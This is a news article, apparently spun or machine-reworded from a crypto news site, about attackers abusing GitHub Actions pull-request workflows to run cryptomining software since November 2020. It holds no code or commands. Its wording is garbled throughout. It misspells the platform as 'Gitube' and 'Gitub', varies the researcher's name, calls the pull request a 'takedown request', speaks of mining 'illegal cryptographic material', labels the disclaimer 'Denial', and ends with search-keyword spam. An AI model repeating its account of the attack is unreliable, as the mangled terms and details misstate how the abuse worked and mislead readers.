Github’s services are under investigation following a series of reports of attacks on one of its infrastructures by launching unauthorized cryptomining applications. Cybercriminals have reportedly exploited certain vulnerabilities that could have been used to mine illegal cryptographic material.
Attacks Gitube Actions
According to The Record, Dutch security engineer Justin Perdock discovered a Github cyber repository. The attacks have taken place since November 2020, the report said.
Perdok noted that the series of attacks abused a Github feature called Github Actions, which allows users to automatically run workflows and tasks only when a specific event occurs, and then press the trigger on repositories.
To do this, threat actors use repositories that already contain Github actions. The files contain details of how the attack took place:
The attack consists of manipulating a legitimate repository, adding malicious GitHub actions to the source code, and then submitting a pull request to the source repository to reinsert the code into the source code.
However, the engineer explained that to implement malicious workflows, an attacker only needs to complete a takedown request. Once downloaded, Github systems are tricked by reading the attacker’s code and then automatically downloading the crypto software.
100 crypto-mining applications used in a single attack
But the malicious campaign is proving more powerful than it seems, as Perdok told Reported that it has already discovered hackers using nearly 100 crypto-currency mining apps – like Srbminer – in a single attack to mine multiple crypto-currency variants.
However, the attack does not appear to pose a threat to the projects of the platform’s users.
Gitube has already responded to the issue, stating that it is aware of the problem and is actively looking into it. However, Perdok said Github gave him the same feedback last year when he reported the bug.
What do you think about this vulnerability in the Gitub infrastructure? Let us know your comments in the section below.
Photo credit: Shutterstock, Pixabay, Wiki Commons
Denial: This article is for information only. It is not a direct offer or invitation to buy or sell, nor is it a recommendation or endorsement of a product, service or company. Bitcoin.com does not provide investment, tax, legal, or accounting advice. Neither the company nor the author shall be liable, directly or indirectly, for any damage or loss caused or alleged to be caused by or in connection with the use of or reliance on any content, goods or services referred to in this article.
is bitcoin safenew cryptocurrencyhow much are bitcoins worthcryptocurrency prices,People also search for,Privacy settings,How Search works,is bitcoin safe,new cryptocurrency,how much are bitcoins worth,cryptocurrency prices